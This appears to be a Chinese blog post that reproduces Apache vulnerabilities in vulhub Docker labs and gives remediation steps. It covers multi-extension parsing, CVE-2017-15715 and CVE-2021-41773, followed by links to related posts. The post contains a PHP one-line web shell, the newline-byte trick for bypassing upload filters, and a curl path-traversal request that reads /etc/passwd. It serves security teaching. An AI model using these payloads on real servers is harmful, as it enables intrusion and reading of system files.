Apache漏洞大全(附修复方法)

已于 2024-08-14 14:27:43 修改
阅读量667 收藏 9
点赞数 4
文章标签: apache
于 2024-08-08 14:33:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/C233333235/article/details/141025269
版权
      Apache 是世界使⽤排名第⼀的 Web 服务器软件。它可以运⾏在⼏乎所有⼴泛使⽤的计算机平台上,由于其跨平台和安全性被⼴泛使⽤,是最流⾏的 Web 服务器端软件之⼀。

一.文件解析

漏洞复现

 环境搭建命令如下

cd /vulhub/httpd/apache_parsing_vulnerability
docker-compose up -d
docker ps -a
打开并访问靶机后,我们上传一个名为1.php.jpg的文件,内容为 
<?php
@eval($_POST['cmd']);
?>

可以直接上传成功,我们尝试访问后也成功访问

然后尝试用蚁剑连接,发现连接成功

漏洞修复

1.在 .htaccess 或主配置文件中强制设置 MIME 类型

2.更新apache到最新版

二.Apache CVE-2017-15715

漏洞复现

搭建环境命令如下

cd vulhub/Apache/CVE-2017-15715
docker-compose up -d

      这一关进入靶场后发现可以给上传的文件改变名称,我们直接上传一个后缀为php的文件,内容为一句话木马,随便起一个名字(这里为2332.php)

<?php
@eval($_POST['cmd']);
?>

然后抓包进行提交,在2332.php文件后加一个空格,打开hex界面,将添加的这个空格所属的20改为0a后放行

放行后没有回显信息告诉我们是否上传成功,所以我们直接去尝试访问,发现访问成功,用蚁剑连接也成功连接

漏洞修复

1.升级到 Apache HTTP Server 的最新版本

2.明确禁用或更改可能被滥用的 MIME 类型

3.安装并配置 Web 应用防火墙

三.⽬录遍历漏洞

       当客户端访问到⼀个⽬录时,Apache服务器将会默认寻找⼀个index list中的⽂件,若⽂件不存在,则会列出当前⽬录下所有⽂件或返回403状态码,⽽列出⽬录下所有⽂件的⾏为称为⽬录遍历。

四.CVE-2021-41773

Apache HTTP Server 路径穿越漏洞

       该漏洞是由于Apache HTTP Server 2.4.49版本存在⽬录穿越漏洞,在路径穿越⽬录 Require all granted允许被访问的的情况下(默认开启),攻击者可利⽤该路 径穿越漏洞读取到Web⽬录之外的其他⽂件 在服务端开启了gi或cgid这两个mod的情况下,这个路径穿越漏洞将可以执⾏任意cgi命令(RCE)

漏洞复现

搭建环境命令如下

docker pull blueteamsteve/cve-2021-41773:no-cgid

访问到页面后显示

然后直接使用poc,curl去查询,命令如下

curl  http://IP:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd

执行成功后即可获取敏感文件内容

Atopos`
关注
apache漏洞汇总apache漏洞汇总
03-29
Apache-flink 未授权访问任意jar包上传反弹shell CVE-2019-0193 Apache-Solr via Velocity template RCE CVE-2019-17564 Apache-Dubbo反序列化漏洞 CVE-2020-13925 Apache Kylin 远程命令执行漏洞 CVE-2020-13957 Apache Solr 未授权上传
2024HW--->中间件漏洞!!!
huohaowen的博客
04-04 1410
上次好像记得讲过了框架漏洞,(weblogic不是)那么,今天我们就来讲一些中间件的漏洞
Apache漏洞
最新发布
qq_50296568的博客
08-19 485
通过对apr_filepath_merge函数传入参数的长度+4大于APR_PATH_MAX,也就是4096的时候,则函数会返回一个路径过长的状态码,导致最后unix套接字的值是null,实现绕过unix套接字判断。(有一些带有防火墙功能的产品也有类似的漏洞比如:1Panel 远程代码执行 CVE-2024-39911)在Apache Solr 7.1之前的版本和Apache Lucene 7.1之前的版本中有RCE漏洞。SSI是一种在服务器端执行的脚本语言,通过在HTML文件中插入。
Apache漏洞汇总:
热门推荐
我了解豹女就像农民伯伯了解大米
03-22 1万+
Apache HTTPD 换行解析漏洞(CVE-2017-15715): 访问ip:8080 上传1.php正常被拦截 查看hex:找到1.php后缀p后缀为70,0a0d为换行,因此在0d之前加入0a 右键0d:Insert byte 上传成功,访问http:ip:8080/%0a 获取后台权限: ...
apache漏洞修复
weixin_33857230的博客
09-01 466
1.SSL/TLS存在Bar Mitzvah Attack漏洞由于apache服务器未安装SSL模块,所以需要在不重新编译apahe的情况下安装mod_ssl模块。1.0 安装apxs,yum install httpd_devel;1.1 进入apache源码目录,进入module文件夹下的ssl目录;1.2 找到oepnssl 的include路径;1.3 运行...
中间件安全—Apache常见漏洞
Innocence_0的博客
07-08 978
简单介绍一下apache是什么,Apache是世界使用排名第一的Web服务器软件。它可以运行在几乎所有广泛使用的计算机上,由于其跨平台和安全性被广泛使用,是最流行的Web服务器端软件之一。它快速、可靠并且可通过简单的API扩充,将python等解释器编译到服务器中。ApacheHTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。apache
Apache Httpd 常见漏洞解析(全)
黑战士的博客
02-17 3355
Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞。在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。
Apache漏洞修复
weixin_33901926的博客
03-15 652
今天受同事的委托,修复一台服务器的Apache漏洞,主要集中在以下几点: 1.Apache httpd remote denial of service(中危) 修复建议:将Apache HTTP Sever升级到2.2.20或更高版本。 解决方法:升级HTTP。 现Apache官网提供的都是源码包。 源码包的使用方法可参考:http://blog.chinaunix.net/u...
关于Apache Tomcat存在文件包含漏洞的整改方法
01-09
目前,漏洞细节尚未公开,厂商已发布新版本完成漏洞修复。 一、漏洞情况分析 Tomcat是Apache软件基金会Jakarta 项目中的一个核心项目,作为目前比较流行的Web应用服务器,深受Java爱好者的喜爱,并得到了部分软件...
Java反序列化漏洞探析及其修复方法研究.pdf
07-02
本文通过具体实例详细描述了利用Java反序列化漏洞进行服务器主机系统提权的详细步骤,并提出了多种漏洞修复方法,以期对电网信息系统的正常稳定运行提供保障。提出的修复方法包括但不限于:应用白名单技术来限制可反...
apache Tomcat 漏洞
09-27
apache Tomcat 漏洞
apache jserv漏洞Apache漏洞
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
10-26 1318
网站扫描出现安全漏洞的处理方法apache jserv漏洞贴三个出来分享下:1、Apache JServ协议服务描述: Apache JServ协议(AJP)是一种二进制协议,可以将来自Web服务器的入站请求代理到 位于Web服务器后面的应用程序服务器。不建议在互联网上公开使用AJP服务。 如果AJP配置错误,可能会允许攻击者访问内部资源。 我的修复建议:{tocamat目录}/conf/server.xml中将下面的配置给注释掉: 2、没有CSRF保护的HTML表单 描述:此警报需要手动确认 跨站点请
Apache Tomcat 文件包含漏洞(CNVD-2020-10487)修复方法
程序员的笔记
02-24 5255
Apache Tomcat 文件包含漏洞(CNVD-2020-10487)修复有以下方法: 1.版本升级,截至2020-2-24,官方公布的已修复漏洞版本包括: Apache Tomcat 7.0.100Apache Tomcat 8.5.51Apache Tomcat 9.0.31 2.关闭AJPConnector: 修改conf/server.xml配置文件的,删除或注释掉这一行,修...
Apache-Flink未授权访问高危漏洞修复
weixin_38255219的博客
07-12 1610
由于flink没有鉴权的设置,使用使用 htpasswd 工具+服务器系统防火墙设置,才能禁用默认对外访问的8081端口,使用用户名+密码实现安全验证登录flink web ui。
apache相关漏洞
m0_48520508的博客
09-30 4150
CVE-2019-17564-Apache Dubbo反序列化漏洞 CVE-2020-1938-Apache Tomcat文件包含漏洞 CVE-2020-1948-Apache Dubbo反序列化漏洞 CVE-2020-1956-Apache Kylin远程命令执行漏洞 CVE-2020-9480-Apache Spark远程代码执行漏洞 CVE-2020-9483-Apache SkyWalkingSQL注入漏洞
web服务器/中间件漏洞系列4:apache漏洞汇总
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
11-30 5268
apache 简介: Apache 是世界使用排名第一的Web 服务器软件。它可以运行在几乎所有广泛使用的 计算机平台上,由于其 跨平台 和安全性被广泛使用,是最流行的Web服务器端软件之一。它快速、可靠并且可通过简单的API扩充,将 Perl/ Python等 解释器编译到服务器中。 一、多后缀名解析漏洞 复现环境: docker : vulhub/httpd/apache_parsing_vulnerability 1、漏洞简介 漏洞成因: Apache文件解析漏洞与用户的配置有密切的关系,严格来说属.
Apache 解析漏洞
小白渣的博客
02-26 2491
呜啦 ~~ 又太久没写博客啦 偶然间看到了这一篇文章,觉得写得还挺好的。下面是文章内容!!! Apache文件如何解析漏洞实例分析 我最为熟悉的便是Apache了,先来研究它的文件解析漏洞。百度许久,又谷歌一番,最终发觉,Apache关于文件解析,似乎只有三种“漏洞”。之所以打引号是因为我觉得这三种“漏洞”都不是Apache漏洞,只是其特性,而很多程序员不了解这种特性,故而写出有问题的代码,这才...
安全中级3:apache中间件漏洞
weixin_62870380的博客
06-06 1597
运维人员在配置http的默认配置文件的时候,开启了AddHandler application/x-httpd-php .php,虽然限制住了php文件,但是我们可以添加后缀.jpg,只要我们的后缀含有一个php文件就可以解析,没必要是最后一个后缀。我们上传php文件的时候,我们的服务器拒绝上传,但是 apache在配置文件的http.conf的时候开启了SSI(服务器端包含)服务,允许我们的html页面上传shtml文件,而我们的cgi是前端的一个脚本,我们利用他的语法执行任意的命令。
Apache Solr 高危代码执行漏洞通告及修复建议
1. 官方解决方案:Apache Solr 已经发布了针对该漏洞的官方修复版本,建议受影响用户尽快升级到最新版本以消除威胁,可以从官方下载地址:<https://solr.apache.org/downloads.html>。 2. 深信服解决方案: - 风险...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值